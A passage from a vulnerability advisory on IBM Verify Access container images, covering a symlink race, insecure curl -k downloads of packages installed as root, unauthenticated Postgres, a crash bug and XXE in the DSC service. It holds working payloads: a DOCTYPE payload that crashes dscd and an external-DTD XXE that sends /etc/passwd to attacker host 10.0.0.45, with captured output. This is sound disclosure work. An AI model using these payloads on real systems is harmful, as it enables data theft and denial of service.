-eq 0 ] ; then\n92 exit 0\n93 fi\n94 \n95 echo \"Error\u003e failed to connect to the service.\"\n96 \n97 cat $error_file; rm -f $cert_file\n[/code]\n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root. \n\nThe filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command. \n\n\n\n## Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system. \n\nThe `/usr/sbin/.bootstrap_common.sh` script is executed from the `/usr/sbin/bootstrap.sh` script when the instance starts:\n\nContent of `/usr/sbin/bootstrap.sh` in verify-access-dsc\n\n[code:shell]\n139 #\n140 # Wait for the snapshot file. \n141 #\n142 \n143 wait_for_snapshot\n[/code]\n\nIn verify-access-runtime, the function `wait_for_snapshot()` is called on line 93 inside the `/usr/sbin/bootstrap.sh` script. 

The function `wait_for_snapshot()` calls the function `download_from_cfgsvc()` (line 251):

Content of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell]
240 #############################################################################
241 # Wait for the snapshot file.
242
243 wait_for_snapshot()
244 {
245 download_from_cfgsvc 1
246
247 if [ ! -f $snapshot ] ; then
248 Echo 969
249
250 while [ ! -f $snapshot ] ; do
251 download_from_cfgsvc 0
252
253 if [ ! -f $snapshot ] ; then
254 sleep 1
255 fi
256 done
257
258 Echo 970
259 fi
260 }
[/code]

The function `download_from_cfgsvc()` uses curl to download a snapshot without checking the SSL certificate of the remote server. The `-k` option (also known as `--insecure`) disables all SSL verification (line 154):

Content of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell]
140 download_from_cfgsvc()
141 {
142 # No need to download the snapshot if the configuration service has not
143 # been defined.
144 if [ -z "$CONFIG_SERVICE_URL" ] ; then
145 return
146 fi
147
148 if [ $1 -eq 1 ] ; then
149 Echo 960
150 fi
151
152 snapshotUri="`basename $snapshot`?type=File&client=`cat /etc/hostname`"
153
154 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
155 "$CONFIG_SERVICE_URL/snapshots/$snapshotUri" \
156 -o $snapshot
157
158 if [ $? -ne 0 ] ; then
159 if [ $1 -eq 1 ] ; then
160 Echo 961
161 fi
162
163 rm -f $snapshot
164 else
165 Echo 962
166 fi
167 }
[/code]

From the curl(1) man page:

 -k, --insecure
 (TLS) By default, every SSL connection curl makes is verified to
 be secure. This option allows curl to proceed and operate even
 for server connections otherwise considered insecure.

 The server connection is verified by making sure the server's
 certificate contains the right name and verifies successfully
 using the cert store.

 See this online resource for further details:
 https://curl.haxx.se/docs/sslcerts.html

 See also --proxy-insecure and --cacert.

The same issue exists with the function `download_fixpacks()` in the same shell script (line 201):

Content of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell]
169 #############################################################################
170 # Attempt to download any requested fixpacks from the configuration service.
171
172 download_fixpacks()
173 {
174 # No need to download the fixpacks if the configuration service has not
175 # been defined.
176 if [ -z "$CONFIG_SERVICE_URL" ] ; then
177 return
178 fi
179
180 # No need to download the fixpacks if no fixpack has been specified, or
181 # if the fixpack has been set to 'disabled'.
182 if [ -z "${FIXPACKS}" -o "${FIXPACKS}" = "disabled" ]; then
183 return
184 fi
185
186 # Set the fixpack directory, and then ensure that the fixpack directory
187 # has been created.
188 fixpack_dir=/tmp/fixpacks
189
190 if [ -d $fixpack_dir ] ; then
191 rm -rf $fixpack_dir/*
192 else
193 mkdir -p $fixpack_dir
194 fi
195
196 # If we get this far we know that one or more fixpacks have been specified.
197 # We need to download each of these now.
198 for fixpack in $FIXPACKS; do
199 fixpackUri="$fixpack?type=File&client=`cat /etc/hostname`"
200
201 curl -k -s --fail \
202 -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
203 "$CONFIG_SERVICE_URL/fixpacks/$fixpackUri" \
204 -o $fixpack_dir/$fixpack
[/code]

The fixpacks will then be installed as root inside the image:

Content of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell]
231 for fixpack in $FIXPACKS; do
232 Echo 967 "${fixpack}"
233 /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} >/dev/null
234 if [ $? -ne 0 ]; then
235 Echo 968 "${fixpack}"
236 fi
[/code]

An attacker located on the network can inject a malicious snapshot file into the platform, or MITM the connection to a server containing the snapshot image, and take control over the entire platform.


## Details - Lack of authentication in Postgres inside verify-access-runtime

It was observed that the Docker image verify-access-runtime configures Postgres without authentication.

The `/usr/sbin/bootstrap.sh` script configures and starts the postgres daemon. The lack of authentication is visible on line 158, where `initdb` is invoked with `-A trust`, so every local connection is accepted without credentials:

[code:shell]
135 #
136 # Start the postgresql server.
137 #
138
139 Echo 974
140
141 db_root=/var/postgresql/config
142 db_data_root=$db_root/data
143 db_snapshot=$db_root/snapshot.sql
144 db_log_dir=/var/application.logs/db/config
145 db_port=5432
146 db_name=config
147 db_user=www-data
148
149 if [ ! -f $db_snapshot ] ; then
150 Echo 975
151 exit 1
152 fi
153
154 mkdir -p $db_log_dir
155
156 rm -rf $db_data_root
157
158 initdb -D $db_data_root --locale=C -U $db_user -A trust > /dev/null
159
160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start
161
162 createdb -U $db_user -p $db_port -w $db_name > /dev/null
163
164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name > /dev/null
165
[/code]

A local attacker can compromise the postgres database.


## Details - Null pointer dereference in dscd - Remote DoS against DSC instances

It was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure.

The DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp.

Using an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:

 [user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443
 * Rebuilt URL to: https://dsc-02.test.lan:8443/
 * Trying 10.0.0.16...
 * TCP_NODELAY set
 * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
 * ALPN, offering h2
 * ALPN, offering http/1.1
 * successfully set certificate verify locations:
 * CAfile: /etc/pki/tls/certs/ca-bundle.crt
 CApath: none
 * TLSv1.3 (OUT), TLS handshake, Client hello (1):
 * TLSv1.3 (IN), TLS handshake, Server hello (2):
 * TLSv1.2 (IN), TLS handshake, Certificate (11):
 * TLSv1.2 (IN), TLS handshake, Request CERT (13):
 * TLSv1.2 (IN), TLS handshake, Server finished (14):
 * TLSv1.2 (OUT), TLS handshake, Certificate (11):
 * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
 * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
 * TLSv1.2 (OUT), TLS handshake, Finished (20):
 * TLSv1.2 (IN), TLS alert, handshake failure (552):
 * error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure
 * Closing connection 0
 curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure

With a client certificate, we can reach the `/DSess/services/DSess` API.

Sending a normal request (ping):

 kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>0</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
 <?xml version='1.0' encoding='utf-8' ?>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <SOAP-ENV:Body>
 <ns1:pingResponse xmlns:ns1="http://sms.am.tivoli.com">
 <ns1:pingReturn>952467756</ns1:pingReturn>
 </ns1:pingResponse>
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>

We can also send a specific XML External Entity (XXE) payload that will crash the remote DSC instance:

 kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H 'SOAPAction: "ping"' --data '<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///dev/random">]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Body><ns1:ping xmlns:ns1="http://sms.am.tivoli.com"><ns1:something>&xxe;</ns1:something></ns1:ping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
 curl: (52) Empty reply from server

When debugging this issue, it appears there is a null pointer dereference in the method `DSessWrapper::ping(void*)` defined in the `/lib64/libamdsc_interface.so` library:

 [root@container-02]# ps -auxww | grep dscd
 6000 2093037 3.4 0.5 427936 40884 ? Ssl 20:07 0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j
 root 2093269 0.0 0.0 12140 1092 pts/0 S+ 20:07 0:00 grep --color=auto dscd
 [root@container-02]# gdb -p 2093037
 [...]
 (gdb) c
 Continuing.
 [----------------------------------registers-----------------------------------]
 RAX: 0x0
 RBX: 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48
 RCX: 0x7fec38000b60 --> 0x1000100030005
 RDX: 0x7fec38025900 --> 0x7fec38021c90 --> 0x7fec38026230 --> 0x7fec38025dc0 --> 0x0
 RSI: 0x4
 RDI: 0x0
 RBP: 0x7fec2804f7c0 --> 0x7fecb0297548 --> 0x7fecb0079560 --> 0x480021e921058b48
 RSP: 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48
 RIP: 0x7fecb007a595 --> 0x48ffffca04e8188b
 R8 : 0x7fec38000b74 --> 0x3000600060005
 R9 : 0x4
 R10: 0x2f ('/')
 R11: 0x7fecaabb2674 --> 0x29058b48fb894853
 R12: 0xffffffff
 R13: 0x7feca642fca0 --> 0x7fec380312f0 ("/DSess/services/DSess")
 R14: 0x7feca642fce0 --> 0x7feca642fcf0 --> 0x7f00676e6970
 R15: 0x0
 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
 [-------------------------------------code-------------------------------------]
 0x7fecb007a58a <_ZN12DSessWrapper4pingEPv+154>: call QWORD PTR [rax+0x38]
 0x7fecb007a58d <_ZN12DSessWrapper4pingEPv+157>: mov esi,0x4
 0x7fecb007a592 <_ZN12DSessWrapper4pingEPv+162>: mov rdi,rax
 => 0x7fecb007a595 <_ZN12DSessWrapper4pingEPv+165>: mov ebx,DWORD PTR [rax]
 0x7fecb007a597 <_ZN12DSessWrapper4pingEPv+167>: call 0x7fecb0076fa0 <_ZdlPvm@plt>
 0x7fecb007a59c <_ZN12DSessWrapper4pingEPv+172>: mov rdi,QWORD PTR [rsp+0x18]
 0x7fecb007a5a1 <_ZN12DSessWrapper4pingEPv+177>: mov rax,QWORD PTR [rdi]
 0x7fecb007a5a4 <_ZN12DSessWrapper4pingEPv+180>: call QWORD PTR [rax+0x2f0]
 [------------------------------------stack-------------------------------------]
 0000| 0x7feca642fc10 --> 0x1d2e480 --> 0x7fecaf4dfbf8 --> 0x7fecaf292870 --> 0x410024f509058b48
 0008| 0x7feca642fc18 --> 0x7fecaf292d8e --> 0xda89481d74c08548
 0016| 0x7feca642fc20 --> 0x7fec28040830 --> 0x7fecaf4e00a0 --> 0x7fecaf29b5a0 --> 0x4100246a21058b48
 0024| 0x7feca642fc28 --> 0x1e3f6e0 --> 0x7fecaf4e1120 --> 0x7fecaf2b2450 --> 0x530022f9a9058b48
 0032| 0x7feca642fc30 --> 0x7feca642fc80 --> 0x7feca642fc90 --> 0x7fec30071c00 --> 0x50 ('P')
 0040| 0x7feca642fc38 --> 0x7fec3800e720 --> 0x7fecaf4dece8 --> 0x7fecaf27a770 --> 0x4800267369058b48
 0048| 0x7feca642fc40 --> 0x7fec38006110 --> 0x7fecaf4df160 --> 0x7fecaf280e20 --> 0x4100261081058b48
 0056| 0x7feca642fc48 --> 0x7fecaf27a8a1 --> 0xf2e668debc48941
 [------------------------------------------------------------------------------]
 Legend: code, data, rodata, value
 Stopped reason: SIGSEGV
 0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
 gdb-peda$ bt
 #0 0x00007fecb007a595 in DSessWrapper::ping(void*) () from target:/lib64/libamdsc_interface.so
 #1 0x00007fecaf27a8a1 in tivsec_axiscpp::ServerAxisEngine::invoke(tivsec_axiscpp::MessageData*) () from target:/lib64/libtivsec_axis_server.so
 #2 0x00007fecaf27b0d2 in tivsec_axiscpp::ServerAxisEngine::process(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
 #3 0x00007fecaf297156 in process_request(tivsec_axiscpp::SOAPTransport*) () from target:/lib64/libtivsec_axis_server.so
 #4 0x00007fecb02a3293 in AMWSMSServiceClient::processRequest(AMWSMSService::WorkerRequest&, bool) () from target:/lib64/libamdsc_server.so
 #5 0x00007fecb02a3ff8 in AMWSMSService::workerThreadRun() () from target:/lib64/libamdsc_server.so
 #6 0x00007fecb02a4089 in start_worker_thread () from target:/lib64/libamdsc_server.so
 #7 0x00007fecaec801ca in start_thread () from target:/lib64/libpthread.so.0
 #8 0x00007fecae6d3d83 in clone () from target:/lib64/libc.so.6

I can also confirm the null pointer dereference in the `dmesg` output of the `container-02` test server:

 [899328.145854] dscd[2106406]: segfault at 0 ip 00007f18e53ff595 sp 00007f18db93ac10 error 4 in libamdsc_interface.so[7f18e53ec000+30000]
 [899485.595069] dscd[2107491]: segfault at 0 ip 00007f25a6041595 sp 00007f259c9cdc10 error 4 in libamdsc_interface.so[7f25a602e000+30000]
 [899575.542524] dscd[2109718]: segfault at 0 ip 00007f331fde5595 sp 00007f3316938c10 error 4 in libamdsc_interface.so[7f331fdd2000+30000]
 [899614.404309] dscd[2111181]: segfault at 0 ip 00007fec9cad4595 sp 00007fec9d29dc10 error 4 in libamdsc_interface.so[7fec9cac1000+30000]
 [899761.869511] dscd[2112040]: segfault at 0 ip 00007f86cf8a0595 sp 00007f86c5edfc10 error 4 in libamdsc_interface.so[7f86cf88d000+30000]

I can confirm the verify-access-dsc instance crashes on container-02 as shown below.

Before the PoC, the verify-access-dsc instance is running:

 [root@container-02]# podman ps
 CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
 e462789b901b ibmcom/verify-access-runtime/10.0.4.0:20220926.6 28 hours ago Up 28 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
 0ff1b85073d6 ibmcom/verify-access-dsc/10.0.4.0:20220926.6 28 hours ago Up 28 minutes ago (healthy) 0.0.0.0:8443-8444->8443-8444/tcp verify-access-dsc

After the PoC, the verify-access-dsc instance no longer runs:

 [root@container-02]# podman ps
 CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
 e462789b901b ibmcom/verify-access-runtime/10.0.4.0:20220926.6 28 hours ago Up 28 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
 [root@container-02]#

An attacker with the dsc-client SSL certificate can crash the DSC servers and bring down the entire authentication system.
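Legitimate DSess requests (like the ping request shown above) never carry a DTD, while the crash payload depends on a `<!DOCTYPE ...>` declaration. Until the XML parser itself is hardened, a crude stop-gap at a wrapper or reverse-proxy level is to reject any request body containing a DOCTYPE. This is a naive pre-filter sketch (`reject_doctype` is a hypothetical helper, not part of the product), not a substitute for disabling entity expansion in the parser:

```shell
# Naive pre-filter: refuse XML payloads that contain a DOCTYPE declaration.
# Both the crash payload and classic XXE payloads rely on <!DOCTYPE ...>;
# normal DSess SOAP requests do not.
reject_doctype() {
    # $1: file containing the request body.
    # Returns 1 (reject) if a DOCTYPE is present, 0 (accept) otherwise.
    if grep -qi '<!DOCTYPE' "$1"; then
        echo "Error> DOCTYPE declaration rejected" >&2
        return 1
    fi
    return 0
}
```

A case-insensitive grep also catches `<!doctype` variants, but a determined attacker can still evade text-level filters with encoding tricks, which is why the real fix belongs in the Axis C++ XML parser configuration.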

## Details - XML External Entity (XXE) in dscd

It was observed that the DSC (Distributed Session Cache) servers are vulnerable to XML External Entity (XXE) attacks. DSC servers are used to store session information.

The DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp.

With a client certificate, we can reach the `/DSess/services/DSess` API.

Content of the `payload.txt` file containing the XXE payload that will be sent to the remote DSC server:

 <?xml version="1.0" encoding="utf-8" ?>
 <!DOCTYPE foo [
 <!ENTITY % xxe SYSTEM "http://10.0.0.45/dtd.xml">
 %xxe;
 ]>
 <foo></foo>
 <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <SOAP-ENV:Body>
 <ns1:ping xmlns:ns1="http://sms.am.tivoli.com">
 <ns1:something>X</ns1:something>
 </ns1:ping>
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>

Content of the `dtd.xml` file hosted on http://10.0.0.45/. This DTD file is referenced by the `payload.txt` file:

 kali% cat /var/www/html/dtd.xml
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.0.0.45/?x=%file;'>">
 %eval;
 %exfiltrate;

Sending the previous payload results in an exception on the remote DSC server:

 kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -H 'SOAPAction: "ping"' --data '@payload.txt' -v
 * Trying 10.0.0.16:8443...
 * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
 [...]
 > POST /DSess/services/DSess HTTP/1.1
 > Host: dsc-02.test.lan:8443
 > User-Agent: curl/7.82.0
 > Accept: */*
 > SOAPAction: "ping"
 > Content-Length: 453
 > Content-Type: application/x-www-form-urlencoded
 >
 * Mark bundle as not supporting multiuse
 < HTTP/1.1 200 OK
 < Server: Apache Axis C++/1.6.a
 < Connection: close
 < Content-Length: 330
 < Content-Type: text/xml
 <
 <?xml version='1.0' encoding='utf-8' ?>
 <SOAP-ENV:Envelope>
 <SOAP-ENV:Body>
 <SOAP-ENV:Fault>
 <faultcode>SOAP-ENV:Server</faultcode>
 <faultstring>Unknown exception</faultstring>
 <faultactor>server name:listen port</faultactor>
 <detail>Unknown Exception has occured</detail>
 </SOAP-ENV:Fault>
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>

 * Closing connection 0
 * TLSv1.2 (OUT), TLS alert, close notify (256):

At the same time, when sniffing the HTTP connections to the remote HTTP server providing `http://10.0.0.45/?x=%file`, we can observe HTTP requests from the DSC server (acting as an HTTP client).

There is a successful exfiltration of the `/etc/passwd` file of the DSC instance - this file was specified in the `dtd.xml` file at `http://10.0.0.45/dtd.xml`, used by the malicious payload:

 kali# tcpdump -n -i eth0 -s0 -X port 80
 tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
 listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
 10:01:12.655204 IP 10.0.0.16.60254 > 10.0.0.45.80: Flags [P.], seq 1:753, ack 1, win 229, options [nop,nop,TS val 2959987485 ecr 3936552717], length 752: HTTP: GET /root:x:0:0:root:/root:/bin/bash
 [...]
 0x0030: eaa3 070d 4745 5420 2f72 6f6f 743a 783a ....GET./root:x:
 0x0040: 303a 303a 726f 6f74 3a2f 726f 6f74 3a2f 0:0:root:/root:/
 0x0050: 6269 6e2f 6261 7368 0a62 696e 3a78 3a31 bin/bash.bin:x:1
 0x0060: 3a31 3a62 696e 3a2f 6269 6e3a 2f73 6269 :1:bin:/bin:/sbi
 0x0070: 6e2f 6e6f 6c6f 6769 6e0a 6461 656d 6f6e n/nologin.daemon
 0x0080: 3a78 3a32 3a32 3a64 6165 6d6f 6e3a 2f73 :x:2:2:daemon:/s
 0x0090: 6269 6e3a 2f73 6269 6e2f 6e6f 6c6f 6769 bin:/sbin/nologi
 0x00a0: 6e0a 6164 6d3a 783a 333a 343a 6164 6d3a n.adm:x:3:4:adm:
 0x00b0: 2f76 6172 2f61 646d 3a2f 7362 696e 2f6e /var/adm:/sbin/n
 0x00c0: 6f6c 6f67 696e 0a6c 703a 783a 343a 373a ologin.lp:x:4:7:
 0x00d0: 6c70 3a2f 7661 722f 7370 6f6f 6c2f 6c70 lp:/var/spool/lp
 0x00e0: 643a 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a d:/sbin/nologin.
 0x00f0: 7379 6e63 3a78 3a35 3a30 3a73 796e 633a sync:x:5:0:sync:
 0x0100: 2f73 6269 6e3a 2f62 696e 2f73 796e 630a /sbin:/bin/sync.
 0x0110: 7368 7574 646f 776e 3a78 3a36 3a30 3a73 shutdown:x:6:0:s
 0x0120: 6875 7464 6f77 6e3a 2f73 6269 6e3a 2f73 hutdown:/sbin:/s
 0x0130: 6269 6e2f 7368 7574 646f 776e 0a68 616c bin/shutdown.hal
 0x0140: 743a 783a 373a 303a 6861 6c74 3a2f 7362 t:x:7:0:halt:/sb
 0x0150: 696e 3a2f 7362 696e 2f68 616c 740a 6d61 in:/sbin/halt.ma
 0x0160: 696c 3a78 3a38 3a31 323a 6d61 696c 3a2f il:x:8:12:mail:/
 0x0170: 7661 722f 7370 6f6f 6c2f 6d61 696c 3a2f var/spool/mail:/
 0x0180: 7362 696e 2f6e 6f6c 6f67 696e 0a6f 7065 sbin/nologin.ope
 0x0190: 7261 746f 723a 783a 3131 3a30 3a6f 7065 rator:x:11:0:ope
 0x01a0: 7261 746f 723a 2f72 6f6f 743a 2f73 6269 rator:/root:/sbi
 0x01b0: 6e2f 6e6f 6c6f 6769 6e0a 6761 6d65 733a n/nologin.games:
 0x01c0: 783a 3132 3a31 3030 3a67 616d 6573 3a2f x:12:100:games:/
 0x01d0: 7573 722f 6761 6d65 733a 2f73 6269 6e2f usr/games:/sbin/
 0x01e0: 6e6f 6c6f 6769 6e0a 6674 703a 783a 3134 nologin.ftp:x:14
 0x01f0: 3a35 303a 4654 5020 5573 6572 3a2f 7661 :50:FTP.User:/va
 0x0200: 722f 6674 703a 2f73 6269 6e2f 6e6f 6c6f r/ftp:/sbin/nolo
 0x0210: 6769 6e0a 6e6f 626f 6479 3a78 3a36 3535 gin.nobody:x:655
 0x0220: 3334 3a36 3535 3334 3a4b 6572 6e65 6c20 34:65534:Kernel.
 0x0230: 4f76 6572 666c 6f77 2055 7365 723a 2f3a Overflow.User:/:
 0x0240: 2f73 6269 6e2f 6e6f 6c6f 6769 6e0a 6973 /sbin/nologin.is
 0x0250: 616d 3a78 3a36 3030 303a 3630 3030 3a3a am:x:6000:6000::
 0x0260: 2f68 6f6d 652f 6973 616d 3a2f 6269 6e2f /home/isam:/bin/
 0x0270: 6261 7368 0a69 766d 6772 3a78 3a36 3030 bash.ivmgr:x:600
 0x0280: 313a 3630 3031 3a41 6363 6573 7320 4d61 1:6001:Access.Ma
 0x0290: 6e61 6765 7220 5573 6572 3a2f 6f70 742f nager.User:/opt/
 0x02a0: 506f 6c69 6379 4469 7265 6374 6f72 3a2f PolicyDirector:/
 0x02b0: 6269 6e2f 6661 6c73 650a 7469 766f 6c69 bin/false.tivoli
 0x02c0: 3a78 3a36 3030 323a 3630 3032 3a4f 776e :x:6002:6002:Own
 0x02d0: 6572 206f 6620 5469 766f 6c69 2043 6f6d er.of.Tivoli.Com
 [...]

An attacker can read any file located on the instance - the DSC server will send any file specified in the payload to an attacker-controlled HTTP server.

An attacker with the dsc-client SSL certificate can exfiltrate any sensitive information from the instance.


## Details - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)

It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure communications to download several rpm and zip files that will then be installed or decompressed as root.

The `/usr/sbin/install_isva.sh` script contains insecure downloading of rpm files and zip files. These rpm files will then be installed as root.

An attacker located on the network can inject malicious rpm or zip files into the authentication platform and take control over the entire authentication platform.
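The common flaw across all of these download paths is the `-k`/`--insecure` flag. Verification can be restored without a public PKI by pinning the internal web server's CA with `--cacert`. A minimal sketch (the `WEBSERVER_CA_FILE` variable and `fetch_verified` helper are assumptions for illustration, not part of the original scripts):

```shell
# Sketch: download helper that keeps TLS verification enabled.
# WEBSERVER_CA_FILE (hypothetical) points at the CA bundle that signed
# the internal web server's certificate.
fetch_verified() {
    url="$1"; out="$2"
    # --cacert pins the expected CA instead of disabling verification;
    # --fail turns HTTP errors into a non-zero exit status so callers
    # never install a partial download or an error page.
    curl --fail -s --cacert "${WEBSERVER_CA_FILE:?CA bundle required}" \
        "$url" -o "$out"
}
```

The `${WEBSERVER_CA_FILE:?...}` expansion makes the helper fail closed: if no CA bundle is configured, the download is refused rather than silently falling back to an unverified connection.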

There are 3 different `/usr/sbin/install_isva.sh` scripts found in these images, but they share the same vulnerable code:

 kali-docker# sha256sum **/install_isva.sh
 1c851f579baeda9d3c11e7721aaa5960dc6a3d6b052bcc8a46979d0634e31892 _verify-access-dsc.tar/787d9cec79e27fccd75a56b7101b39da38161f9d3749d6d0fd7cfcc8252aca34/usr/sbin/install_isva.sh
 00f2ca8ad004af9c9e16b6cfdf480dcdb52dc36c7ff64df2bcc34495f6a9ae8d _verify-access-runtime.tar/694cb5f84eff9a4b0aac37a4bd9f65116051953f3aee5e4e998af5938e684a5e/usr/sbin/install_isva.sh
 8a59d7f89c6d587d9b764b9e4748cf0d20d406f65433a813464b32a13745f6da _verify-access-wrp.tar/937031a6ab4bc7bd504dcbee8d242f181e904c1722489077cf468daae176e2da/usr/sbin/install_isva.sh

Vulnerable code in verify-access-dsc - download over HTTP or without checking the SSL certificate (lines 24, 60 and 82), and installation of packages as root without checking the signatures (line 76):

Content of `/usr/sbin/install_isva.sh` in verify-access-dsc:

[code:shell]
22 files=/root/files.txt
23
24 curl -k ${WEBSERVER}/ -o $files
[...]
38 #
39 # Install each of our RPMs.
40 #
41
42 pkgs="gskcrypt64 \
43 gskssl64 \
44 Base-ISVA \
45 idsldap-license64 \
46 idsldap-cltbase64 \
47 idsldap-clt64bit64 \
48 Pdlic-PD \
49 TivSecUtl-TivSec \
50 PDRTE-PD \
51 PDWebRTE-PD \
52 PDWebDSC-PD"
53
54 for pkg in $pkgs; do
55 echo "Installing $pkg"
56
57 # Download and install the file.
58 rpm_file=`locate_rpm_file $pkg`
59
60 curl -fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file
[...]
76 rpm -i $extra_args /root/$rpm_file
[...]
78 # Download the include file and delete all files not included in the file.
79 include=`rpm -qp /root/$rpm_file --qf "%{NAME}.include"`
80 include_file=/root/$include
81
82 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e
83
84 if [ $rc -eq 0 -a -f $include_file ] ; then
85 # Convert the include file to be regular expression based instead of
86 # glob based.
87 sed -i "s|\*|.*|g" $include_file
88
89 for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do
90 if [ -f $entry ] ; then
91 rm -f $entry
92 fi
93 done
94 fi
[/code]

The code in verify-access-wrp is very similar and shares the same vulnerabilities.

Vulnerable code in verify-access-runtime - the same vulnerability in `/usr/sbin/install_isva.sh`, with an additional insecure download due to the `-k` option on line 117 (alias of `--insecure`) and extraction of zip files as root on line 119:

[code:shell]
28 files=/root/files.txt
29
30 curl -k ${WEBSERVER}/ -o $files
[...]
41 pkgs="gskcrypt64 \
42 gskssl64 \
43 Base-ISVA \
44 PDlic-PD \
45 TivSecUtl-TivSec \
46 PDRTE-PD \
47 PDWebWAPI-PD \
48 PDWebDSC-PD \
49 VerifyAccessRuntimeFeatures \
50 MesaConfig \
51 FIM \
52 RBA"
53
54 for pkg in $pkgs; do
55 echo "Installing $pkg"
56
57 # Download and install the file.
58 rpm_file=`locate_rpm_file $pkg`
59
60 curl --fail -s -k ${WEBSERVER}/$rpm_file -o /root/$rpm_file
[...]
78 rpm -i $extra_args /root/$rpm_file
79
80 # Download the include file and delete all files not included in the file.
81 include=`rpm -qp /root/$rpm_file --qf "%{NAME}.include"`
82 include_file=/root/$include
83
84 set +e; curl --fail -s -k ${WEBSERVER}/$include -o $include_file; rc=$?; set -e
85
86 if [ $rc -eq 0 -a -f $include_file ] ; then
87 # Convert the include file to be regular expression based instead of
88 # glob based.
89 sed -i "s|\*|.*|g" $include_file
90
91 for entry in `rpm -ql /root/$rpm_file | grep -xvf $include_file`; do
92 if [ -f $entry ] ; then
93 rm -f $entry
94 fi
95 done
96 fi
[...]
108 zips="\
109 com.ibm.tscc.rtss.wlp.zip:/opt/rtss \
